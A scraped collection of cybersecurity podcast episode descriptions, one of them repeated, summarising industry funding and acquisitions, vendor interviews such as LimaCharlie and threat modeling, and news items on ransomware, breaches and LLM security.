Only one funding announcement this week, so we dive deep into Thoma Bravo's past and present portfolio. They recently announced a sale of Venafi to Cyberark and no one is quite sure how much of a hand they had in the LogRhythm/Exabeam merger, and whether or not they sold their stake in the process. We also have a crazy stat Ross Haleliuk spotted in Bessemer's analysis: "13 out of 14 cybersecurity companies acquired in the past year for over $100M were from Israel". Is this an anomaly? Does it just mean that Israel wasn't shy about selling when the market was down? We discuss. A number of new product announcements continue to trickle out post-RSA. We'll also discuss Sam Altman and OpenAI's decision to use Scarlett Johansson's voice against her will and what it could mean for deepfakes, advanced social engineering techniques, and general big tech sliminess. Do you know what a "product glorifier" is? How about a glowstacker? You will if you check out the second-to-last story in the show notes! See the show notes for individual descriptions on each RSAC interview. This week, we feature speakers from Sailpoint, Okta, Ping Identity, LimaCharlie, QwietAI, and Picus! Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw-363

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Some of the findings that were revealed by this leak about the inner workings of the Russian company Albatross and its Albatross-M5 UAVs, now being used in the war against Ukraine. The U.S. Department of Justice has charged Dmitry Yuryevich Khoroshev, a 31-year-old Russian national, as the leader of the LockBit ransomware group.ESET reveals the persistent threat posed by the Ebury malware, which has compromised approximately 400,000 Linux servers since 2009, which was initially documented in 2014.Zoom has announced the global rollout of post-quantum end-to-end encryption for its video meetings, a significant step forward in securing communications against future quantum computing threats.Dropbox recently disclosed a security breach impacting its Dropbox Sign eSignature service.

Only one funding announcement this week, so we dive deep into Thoma Bravo's past and present portfolio. They recently announced a sale of Venafi to Cyberark and no one is quite sure how much of a hand they had in the LogRhythm/Exabeam merger, and whether or not they sold their stake in the process. We also have a crazy stat Ross Haleliuk spotted in Bessemer's analysis: "13 out of 14 cybersecurity companies acquired in the past year for over $100M were from Israel". Is this an anomaly? Does it just mean that Israel wasn't shy about selling when the market was down? We discuss. A number of new product announcements continue to trickle out post-RSA. We'll also discuss Sam Altman and OpenAI's decision to use Scarlett Johansson's voice against her will and what it could mean for deepfakes, advanced social engineering techniques, and general big tech sliminess. Do you know what a "product glorifier" is? How about a glowstacker? You will if you check out the second-to-last story in the show notes! See the show notes for individual descriptions on each RSAC interview. This week, we feature speakers from Sailpoint, Okta, Ping Identity, LimaCharlie, QwietAI, and Picus! Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw-363

Security Operations, or SecOps, refers to the collaboration between security and operations teams to secure an organization's systems, applications, and data. Maxime Lamothe-Brassard is a Co-Founder of LimaCharlie which is a cloud SecOps platform. He has a background in security and has previously worked at the Canadian Intelligence service, Crowdstrike, Google, and Google X. He The post Modern SecOps with Maxime Lamothe-Brassard appeared first on Software Engineering Daily.

On this episode of The Cyebrsecurity Defenders Podcast, we talk platformization and the SecOps Cloud Platform with Maxime Lamothe-Brassard, Founder & CEO of LimaCharlie.In a world where digital transformation has become the norm, cybersecurity professionals face unprecedented challenges. The traditional approach of managing dozens of disparate point solutions and siloed security tools, while attempting to control costs, is no longer sufficient.It's time to embrace a new era of cybersecurity in the SecOps Cloud Platform – one that treats cybersecurity as a set of capabilities much like how cloud providers did for IT. We challenge you to question the status quo and to open your mind a new way of thinking about security operations.You can get started for free at limacharlie.io

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Ukrainian hackers claim to have breached the Russian drone developer Albatross, leaking 100 gigabytes of data, including internal documentation, technical data and drawings of various types of unmanned aerial vehicles.A critical vulnerability in Atlassian Confluence Data Center and Server was used to deploy a Linux variant of Cerber ransomware.Cisco Talos are actively monitoring a global increase in brute-force attacks against a variety of targets, including VPN services, web application authentication interfaces and SSH services since at least March 18, 2024. An emerging threat campaign named ArcaneDoor, orchestrated by a previously unknown actor identified as UAT4356, now also known as STORM-1849 by Microsoft.The MITRE Corporation reported a significant security breach within one of its specialized networks, the Networked Experimentation, Research, and Virtualization Environment - or NERVE.

A clear pattern with startups getting funding this week are "autonomous" products and features. Automated detection engineering Autonomously map and predict malicious infrastructure ..."helps your workforce resolve their own security issues autonomously" automated remediation automated compliance management & reporting I'll believe it when I see it. Don't get me wrong, I think we're in desperate need of more automation when it comes to patching and security decision-making. I just don't think the majority of the market has the level of confidence necessary to trust security products to automate things without a human in the loop. The way LimaCharlie is going about it, with their new bi-directional functionality they're talking up right now, might work, as detections can be VERY specific and fine-grained. We've already seen a round of fully automated guardrail approaches (particularly in the Cloud) fail, however. My prediction? Either what we're seeing isn't truly automated, or it will become a part of the product that no one uses - like Metasploit Pro licenses.   We've talked about generative AI in a general sense on our podcast for years, but we haven't done many deep dives into specific security use cases. That ends with this interview, as we discuss how generative AI can improve SecOps with Ely Kahn. Some of the use cases are obvious, while others were a complete surprise to me. Check out this episode if you're looking for some ideas! This segment is sponsored by SentinelOne. Visit https://securityweekly.com/sentinelone to learn more about them!   This is a great interview with Adam Shostack on all things threat modeling. He's often the first name that pops into people's heads when threat modeling comes up, and has created or been involved with much of the foundational material around the subject. Adam recently released a whitepaper that focuses on and defines inherent threats. Resources: Here's the Inherent Threats Whitepaper Adam's book, Threat Modeling: Designing for Security Adam's latest book, Threats: What Every Engineer Should Learn from Star Wars We mention the Okta Breach - here's my writeup on it We mention the CSRB report on the Microsoft/Storm breach, here's Adam's blog post on it And finally, Adam mentions the British Library incident report, which is here, and Adam's blog post is here Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw-359

Protecting a normal enterprise environment is already difficult. What must it be like protecting a sports team? From the stadium to merch sales to protecting team strategies and even the players - securing an professional sports team and its brand is a cybersecurity challenge on a whole different level. In this interview, we'll talk to Joe McMann about how Binary Defense helps to protect the Cleveland Browns and other professional sports teams. This week, Adrian and Tyler discuss some crazy rumors - is it really possible that a cloud security startup valued at over $8 billion in November 2021 just got bought for $200 million??? Some healthy funding for Cyera and Cohesity ($300m and $150m, respectively) Onum, Alethea, Sprinto, Andesite AI, StrikeReady, YL-Backed Miggo, Nymiz, Salvador Technologies, and Simbian all raise smaller seed, A, or B rounds. Akamai picks up API security startup, Noname Security, Zscaler picks up Airgap networks, and it's rumored that Armis will acquire Silk Security for $150M. LimaCharlie seems to be doing some vertical growth, adding its own response and automation capabilities (what they call "bi-directional" capabilities). CISA releases a malware analysis system to the general public. Boostsecurity.io releases "poutine", an open source CI/CD pipeline vulnerability scanner. Some great essays this week, with Phil Venables' Letter from the Future, Ben Hawkes' Robots Dream of Root Shells, and Aileen Lee's 10 year Unicorn anniversary piece. We briefly discuss the 3rd party breach that affected Cisco Duo customers, and the financial impact of Change Healthcare's highly disruptive ransomware incident. Finally, we talk about the latest research on the security of LLMs and the apps using them. It's not looking great. For more details, check out the show notes here: https://www.scmagazine.com/podcast-episode/3188-enterprise-security-weekly-358 Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw-358